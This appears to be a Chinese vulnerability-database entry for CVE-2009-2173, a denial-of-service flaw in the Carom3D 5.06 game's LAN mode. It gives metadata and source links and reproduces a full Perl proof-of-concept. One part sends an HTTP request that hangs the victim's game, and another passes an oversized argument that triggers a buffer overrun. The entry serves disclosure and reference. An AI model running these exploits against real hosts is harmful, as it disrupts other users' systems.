Gameis Carom3D LAN game特征拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117977 漏洞类型 资源管理错误
发布时间 2009-06-16 更新时间 2009-06-16
CVE编号 CVE-2009-2173 CNNVD-ID CNNVD-200906-372
漏洞平台 Windows CVSS评分 3.5
|漏洞来源
https://www.exploit-db.com/exploits/8971
https://www.securityfocus.com/bid/44135
https://cxsecurity.com/issue/WLB-2009060177
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-372
|漏洞详情
Carom3D5.06版本的LANgame特征,远程认证用户可以借助一个特制的对TCP端口28012HTTP请求,造成拒绝服务(应用程序悬挂)。
|漏洞EXP
#!/usr/bin/perl
#
# Title: Carom3D 5.06 Unicode Buffer Overrun/Denial Of Service Vulnerability
#
#
# Summary: Carom 3D is an online multi-user billiard game created with special
#	   3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8
#	   ball and other Billiard games to life.
#
# Product Web Page: http://www.carom3d.com/
#
# Description: The world famous korean game Carom3D suffers from a buffer overflow
#	       and a denial of service vulnerability. The BoF is triggered at
#	       runtime when we append 218 > bytes as an argument. ~1000 bytes
#	       overwrites SEH. The denial of service is triggered when a user
#	       creates a LAN Game (cred. needed), creates a room and awaits
#	       other players to join the game. While awaiting (listening on port
#	       28012), with a simple HTTP GET/POST, an attacker can lockdown
#	       the GUI of the user created the room, not alowing to start or
#	       even exit the game's GUI, unless forced quit (X).
#
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 15.06.2009
#

# ----------------------------------DoS---------------------------------- #

use LWP::Simple;

my $url = 'http://192.168.1.3:28012';
my $lockdown = get $url;
die "Couldn't get $url" unless defined $lockdown;

# You can Ctrl+C, the lockdown is ON.

# ---------------------------------/DoS---------------------------------- #





###########################################################################





# ----------------------------------BoF---------------------------------- #

# Added 217 bytes as argument = runs normally.
# Added 218 bytes as argument triggers the MS VC++ Runtime Library
# 'Buffer Overrun' error msg box informing us that the program's
# internal state is corrupted.

system('C:\\Progra~1\\Neoact\\Carom3D\\carom.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

# ---------------------------------/BoF---------------------------------- #

# milw0rm.com [2009-06-16]
|受影响的产品
Neoact Carom3D 5.06
|参考资料

来源:XF
名称:carom3d-langame-dos(51219)
链接:http://xforce.iss.net/xforce/xfdb/51219
来源:MILW0RM
名称:8971
链接:http://www.milw0rm.com/exploits/8971